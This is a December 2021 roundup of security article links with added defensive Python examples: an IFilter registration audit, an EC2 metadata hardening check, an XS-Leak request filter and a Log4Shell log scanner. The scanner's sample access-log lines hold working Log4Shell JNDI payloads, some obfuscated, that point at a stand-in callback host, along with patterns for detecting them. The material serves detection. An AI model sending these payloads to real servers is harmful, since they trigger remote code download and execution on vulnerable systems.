Process Ghosting https://pentestlaboratories.com/2021/12/08/process-ghosting/
Pentest Laboratories
Understanding how endpoint products work to identify malicious actions can lead to the discovery of security gaps which can be used for evasion during red team operations. The technique Process Her…
Nice explanation on the basics » A simple x86_64 stack based buffer overflow exploitation with gdb https://oxagast.org/posts/simple-buffer-overflow-exploitation-walkthrough-gdb/
oxagast.org oxasploits
A simple x86_64 stack based buffer overflow exploitation with gdb
Background
Malicious IFilter: a DLL waiting patiently (not even loaded) until the file with a particular extension appears, then it executes as the LOCALSYSTEM https://github.com/gtworek/PSBits/tree/master/IFilter
GitHub
PSBits/IFilter at master · gtworek/PSBits
Simple (relatively) things allowing you to dig a bit deeper than usual. - gtworek/PSBits
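The trick above works because Windows Search resolves the handler for a file type through a chain of registry keys and only loads the DLL when the indexer meets a matching file. The audit below is an added example, not code from gtworek/PSBits: it walks that documented chain (extension → PersistentHandler → PersistentAddinsRegistered\{IID_IFilter} → InprocServer32) and reports handler DLLs outside the Windows and Program Files trees. The registry reader is injected so the same logic runs against the constructed in-memory registry (all GUIDs, the `.evil` extension and the DLL paths are made up for the example) or against a live HKLM on Windows through `winreg`.

```python
"""Audit IFilter registrations for a list of file extensions.

Added example, not code from gtworek/PSBits. Registration chain under HKLM:
  SOFTWARE\\Classes\\<ext>\\PersistentHandler                         -> {persistent-handler CLSID}
  SOFTWARE\\Classes\\CLSID\\{ph}\\PersistentAddinsRegistered\\{IID_IFilter} -> {filter CLSID}
  SOFTWARE\\Classes\\CLSID\\{filter}\\InprocServer32                  -> handler DLL path
"""
import sys
from typing import Callable, Optional

IID_IFILTER = "{89BCB740-6119-101A-BCB7-00DD010655AF}"   # IID_IFilter
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

Reader = Callable[[str], Optional[str]]   # key path under HKLM -> its (Default) value, or None


def _normalize_path(dll: str) -> str:
    p = dll.strip().strip('"').lower()
    return p.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")


def resolve_ifilter(ext: str, read: Reader) -> Optional[dict]:
    """Follow the chain for one extension; None when no IFilter is registered."""
    ph = read(f"SOFTWARE\\Classes\\{ext}\\PersistentHandler")
    if not ph:
        return None
    flt = read(f"SOFTWARE\\Classes\\CLSID\\{ph}\\PersistentAddinsRegistered\\{IID_IFILTER}")
    if not flt:
        return None
    dll = read(f"SOFTWARE\\Classes\\CLSID\\{flt}\\InprocServer32")
    if not dll:
        return None
    return {"ext": ext, "persistent_handler": ph, "filter_clsid": flt, "dll": dll,
            "suspicious": not _normalize_path(dll).startswith(TRUSTED_PREFIXES)}


def audit(extensions, read: Reader) -> list:
    return [r for r in (resolve_ifilter(e, read) for e in extensions) if r]


# Constructed registry: GUIDs, the ".evil" extension and the paths are made up.
FAKE_HKLM = {
    "SOFTWARE\\Classes\\.txt\\PersistentHandler": "{5e941d80-bf96-11cd-b579-08002b30bfeb}",
    "SOFTWARE\\Classes\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\PersistentAddinsRegistered\\"
    + IID_IFILTER: "{c1243ca0-bf96-11cd-b579-08002b30bfeb}",
    "SOFTWARE\\Classes\\CLSID\\{c1243ca0-bf96-11cd-b579-08002b30bfeb}\\InprocServer32":
        "%SystemRoot%\\system32\\query.dll",
    "SOFTWARE\\Classes\\.evil\\PersistentHandler": "{11111111-1111-1111-1111-111111111111}",
    "SOFTWARE\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\PersistentAddinsRegistered\\"
    + IID_IFILTER: "{22222222-2222-2222-2222-222222222222}",
    "SOFTWARE\\Classes\\CLSID\\{22222222-2222-2222-2222-222222222222}\\InprocServer32":
        "C:\\Users\\Public\\filter.dll",
}
_FAKE = {k.lower(): v for k, v in FAKE_HKLM.items()}   # registry paths are case-insensitive


def fake_reader(path: str) -> Optional[str]:
    return _FAKE.get(path.lower())


def hklm_reader() -> Reader:
    """Live reader for a Windows host."""
    import winreg

    def read(path: str) -> Optional[str]:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                value, _ = winreg.QueryValueEx(key, "")    # "" = the (Default) value
                return str(value)
        except OSError:
            return None
    return read


if __name__ == "__main__":
    read = hklm_reader() if sys.platform == "win32" else fake_reader
    for r in audit([".txt", ".evil", ".pdf"], read):
        print(f"{r['ext']:6} {'SUSPICIOUS' if r['suspicious'] else 'ok':10} {r['dll']}")
```

On a real host, enumerate every subkey of `SOFTWARE\Classes` that starts with a dot instead of a fixed list, and treat an unsigned DLL or one that does not exist yet (the "waiting patiently" case) as just as interesting as one in an odd directory.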
FIN13: A Cybercriminal Threat Actor Focused on Mexico https://www.mandiant.com/resources/fin13-cybercriminal-mexico
Google Cloud Blog
FIN13: A Cybercriminal Threat Actor Focused on Mexico | Mandiant | Google Cloud Blog
Threat news: TeamTNT stealing credentials using EC2 Instance Metadata https://sysdig.com/blog/teamtnt-aws-credentials/
Sysdig
TeamTNT malware targeted a Kubernetes Pod and attempted to steal AWS credentials using the EC2 instance metadata.
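The pod is only the vantage point; what hands over the role credentials is an instance that still answers IMDSv1 `GET` requests at 169.254.169.254 and a PUT-response hop limit that lets the IMDSv2 token reach a container. The check below is an added example, not Sysdig's code: it reads the `MetadataOptions` block of `aws ec2 describe-instances` output and reports instances where IMDSv1 is still allowed (`HttpTokens` not `required`) or where the hop limit exceeds 1. The instance IDs and account number in the embedded sample are constructed.

```python
"""Flag EC2 instances whose metadata service configuration allows the
credential theft TeamTNT performed from a pod.

Added example, not Sysdig's code. Field names come from the EC2
describe-instances output; the sample data below is constructed.
"""
import json
import subprocess

SAMPLE_DESCRIBE_INSTANCES = {
    "Reservations": [{"Instances": [
        {"InstanceId": "i-0example1",
         "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/eks-node"},
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 2}},
        {"InstanceId": "i-0example2",
         "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/eks-node"},
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                             "HttpPutResponseHopLimit": 1}},
        {"InstanceId": "i-0example3",
         "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                             "HttpPutResponseHopLimit": 1}},
        {"InstanceId": "i-0example4",
         "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                             "HttpPutResponseHopLimit": 2}},
    ]}]
}


def metadata_findings(describe_output: dict) -> list[dict]:
    """One finding per weak setting: IMDSv1 allowed (high) or hop limit > 1 (medium)."""
    findings = []
    for reservation in describe_output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            iid = inst["InstanceId"]
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue                      # nothing reachable at 169.254.169.254
            has_role = "IamInstanceProfile" in inst   # without a role there is nothing to steal
            fix = (f"aws ec2 modify-instance-metadata-options --instance-id {iid} "
                   "--http-tokens required --http-put-response-hop-limit 1")
            if opts.get("HttpTokens") != "required":
                findings.append({"instance_id": iid, "severity": "high", "has_role": has_role,
                                 "issue": "IMDSv1 allowed: a plain GET to /latest/meta-data/iam/"
                                          "security-credentials/<role> returns keys",
                                 "fix": fix})
            if int(opts.get("HttpPutResponseHopLimit", 1)) > 1:
                findings.append({"instance_id": iid, "severity": "medium", "has_role": has_role,
                                 "issue": "hop limit > 1: the IMDSv2 token PUT response can reach "
                                          "a pod on a bridge network",
                                 "fix": fix})
    return findings


def live_findings(region: str) -> list[dict]:
    """Same check against a real account (needs aws CLI credentials)."""
    out = subprocess.run(["aws", "ec2", "describe-instances", "--region", region, "--output", "json"],
                         capture_output=True, text=True, check=True).stdout
    return metadata_findings(json.loads(out))


if __name__ == "__main__":
    for f in metadata_findings(SAMPLE_DESCRIBE_INSTANCES):
        print(f"{f['instance_id']} [{f['severity']}] role={f['has_role']} {f['issue']}")
        print(f"    fix: {f['fix']}")
```

A hop limit of 1 stops pods in their own network namespace but not pods running with `hostNetwork`, so the durable fix is a node role with minimal permissions and per-workload identities (IAM roles for service accounts) rather than relying on the metadata options alone.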
Is your web browser vulnerable to data theft? XS-Leak explained https://blog.malwarebytes.com/explained/2021/12/is-your-web-browser-vulnerable-to-data-theft-xs-leak-explained/
Malwarebytes Labs
IT security researchers recently exposed new cross-site leak (XS-Leak) attacks against modern-day browsers. But what is XS-Leak anyway?
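XS-Leaks work by having a cross-site page load the target as a script, image or frame and observing a side channel (error events, size, timing) that differs with the victim's login state. The server-side control that removes most of that surface is Fetch Metadata: refuse cross-site sub-resource requests before any state-dependent work runs. The check below is an added example, not code from the Malwarebytes article; it is a framework-neutral version of the resource-isolation policy built on `Sec-Fetch-Site`, `Sec-Fetch-Mode` and `Sec-Fetch-Dest`, and the sample requests are constructed.

```python
"""Fetch Metadata resource isolation against XS-Leak probes.

Added example, not from the Malwarebytes article. allow_request() decides
before the application touches session state, and handle() returns an
identical 403 for every denied request so the denial leaks nothing.
"""

SAME_SIDE = {"same-origin", "same-site", "none"}   # "none" = user-initiated (typed URL, bookmark)


def allow_request(method: str, headers: dict, allow_cross_site_framing: bool = False) -> tuple[bool, str]:
    """Return (allowed, reason). Header names and values are matched case-insensitively."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is None:
        # Browser without Fetch Metadata support: cannot decide here, rely on other defences.
        return True, "no Fetch Metadata headers"
    if site in SAME_SIDE:
        return True, f"sec-fetch-site={site}"
    mode, dest = h.get("sec-fetch-mode"), h.get("sec-fetch-dest")
    if mode == "navigate" and method.upper() == "GET":
        if dest in ("object", "embed"):
            return False, "cross-site navigation into a plugin element"
        if dest in ("iframe", "frame") and not allow_cross_site_framing:
            return False, "cross-site framing"
        return True, "cross-site top-level navigation"
    # Everything else cross-site: scripts, images, fetch(), XHR, fonts, styles...
    return False, f"cross-site {mode or '?'} request for dest={dest or '?'}"


def handle(method: str, headers: dict) -> tuple[int, bytes]:
    """Uniform denial: same status and body whether or not the user is logged in."""
    allowed, _ = allow_request(method, headers)
    if not allowed:
        return 403, b"forbidden"
    return 200, b"<state-dependent content>"   # the real handler runs only past this point


# Constructed requests, with the headers a browser sends for each situation.
SAMPLE_REQUESTS = {
    "script_probe":  ("GET",  {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors",  "Sec-Fetch-Dest": "script"}),
    "image_probe":   ("GET",  {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "no-cors",  "Sec-Fetch-Dest": "image"}),
    "framing_probe": ("GET",  {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe"}),
    "link_click":    ("GET",  {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "document"}),
    "own_xhr":       ("POST", {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors",    "Sec-Fetch-Dest": "empty"}),
    "typed_url":     ("GET",  {"Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate",       "Sec-Fetch-Dest": "document"}),
    "legacy_browser": ("GET", {"User-Agent": "old"}),
}

if __name__ == "__main__":
    for name, (method, headers) in SAMPLE_REQUESTS.items():
        allowed, reason = allow_request(method, headers)
        print(f"{name:15} {'allow' if allowed else 'DENY':5} {reason}")
```

The order matters: the decision is made from request headers alone, so the error event, response size and timing a cross-site probe can observe are the same for logged-in and logged-out victims. Cache-probing leaks are a separate class and need `Cache-Control: no-store` or cache partitioning on top of this check.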
Driver-Based Attacks: Past and Present https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
Rapid7
Driver-Based Attacks: Past and Present | Rapid7 Blog
Leaking EPROCESS address of the specific SYSTEM processes https://blog.rewolf.pl/blog/?p=1683
A phishing document signed by Microsoft – part 1 https://outflank.nl/blog/2021/12/09/a-phishing-document-signed-by-microsoft/
Nice reading after all the madness » Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package https://www.lunasec.io/docs/blog/log4j-zero-day/
Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/
Cado
Log4J is an open-source logging platform running on Java and built into many web platforms. Reports of exploitation started on December 9th.
CVE-2021-44228 vulnerability in Apache Log4j library https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210
Securelist
The summary of the critical vulnerability CVE-2021-44228 in the Apache Log4j library, technical details and mitigations.
Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/
Sysdig
Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j Remote Code Execution (RCE) | Sysdig
CVE-2021-44228 is a CRITICAL vulnerability that allows attackers to execute arbitrary code on a machine; the fix is to update log4j to 2.16.0.
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft News
Microsoft is tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2. Get technical info and guidance for using Microsoft security solutions to protect against attacks.
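The in-the-wild traffic described in the Cado, Securelist and Microsoft write-ups rarely contains a literal `${jndi:` any more: the string is URL-encoded or assembled from nested lookups such as `${${lower:j}ndi:...}`, `${${::-j}${::-n}${::-d}${::-i}:...}` or `${${env:NaN:-j}ndi:...}`. The scanner below is an added example, not code from any of those write-ups: it URL-decodes each log line, evaluates the nested lookup forms the way Log4j's substitution does (from the innermost `${...}` outwards, with `lower:`, `upper:`, a quoted `date:` literal and the `${key:-default}` fallback), and then matches the resulting `${jndi:scheme://host}` sink. The access-log lines are constructed and use documentation IP ranges.

```python
"""Find Log4Shell (CVE-2021-44228) probes in request logs, including obfuscated forms.

Added example, not code from the Cado, Securelist or Microsoft posts. This is a
conservative normaliser for hunting, not a re-implementation of Log4j lookups.
"""
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI_SINK = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.I)


def _evaluate(body: str):
    """Evaluate one lookup body as Log4j 2.x would, or None to leave it untouched."""
    prefix, _, rest = body.partition(":")
    p = prefix.strip().lower()
    if p == "jndi":
        return None                      # the sink itself: keep it for matching
    if p == "lower":
        return rest.lower()
    if p == "upper":
        return rest.upper()
    if p == "date" and len(rest) >= 2 and rest[0] == rest[-1] == "'":
        return rest[1:-1]                # quoted literal inside a date pattern
    if ":-" in body:
        return body.split(":-", 1)[1]    # unknown key with a default evaluates to the default
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _evaluate(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def jndi_targets(text: str) -> list[tuple[str, str]]:
    """(scheme, host[:port]) for every JNDI lookup left after normalisation."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI_SINK.finditer(normalize(text))]


def is_log4shell_probe(text: str) -> bool:
    return bool(jndi_targets(text))


def scan_access_log(lines: list[str]) -> list[dict]:
    return [{"line": i, "scheme": s, "target": t}
            for i, line in enumerate(lines) for s, t in jndi_targets(line)]


# Constructed Apache-style access log lines (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9:1389/b}"',
    '203.0.113.5 - - [10/Dec/2021:03:14:11 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${upper:r}mi://203.0.113.9:1099/d}"',
    '198.51.100.7 - - [10/Dec/2021:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Dec/2021:03:15:02 +0000] "GET /report?d=${date:yyyy-MM-dd} HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']}://{hit['target']}")
```

Run it over every field an application logs, not only the User-Agent, since the vulnerable call is the logging of attacker-controlled strings wherever they arrive (headers, paths, form fields, usernames). Matches point at the callback host the attacker controls, which is the indicator to pivot on; an empty result is not proof of safety, because double encoding, other lookups and payloads split across fields can slip past any normaliser, and the real control remains patching or removing `JndiLookup`.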
Windows Privilege Escalation: Scheduled Task/Job (T1573.005) https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/
Hacking Articles
Learn how to exploit Windows Scheduled Task/Job for privilege escalation using misconfigured task scheduler settings. Note that the MITRE ATT&CK ID for Scheduled Task/Job is T1053.005; the T1573.005 in the article's title and URL is a typo (T1573 is Encrypted Channel).
Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html
How I was able to bypass Cloudflare WAF for SQLi payload https://infosecwriteups.com/how-i-was-able-to-bypass-cloudflare-waf-for-sqli-payload-b9e7a4260026
Medium
Bypassing Cloudflare for achieving SQL Injection
A strategy to land your first pentest job https://blog.pentesterlab.com/a-strategy-to-land-your-first-pentest-job-25209a351689
Pentesterlab
A strategy to land your first pentest job - PentesterLab's Blog
Learn the strategy to get a job in pentesting or web security. Understand different levels of knowledge, from basic to expert, in hacking, code review, and application security. Get insights on how focusing on one category can help you master pentesting and…
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
Worth reading » A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
projectzero.google
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Project Zero
Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and...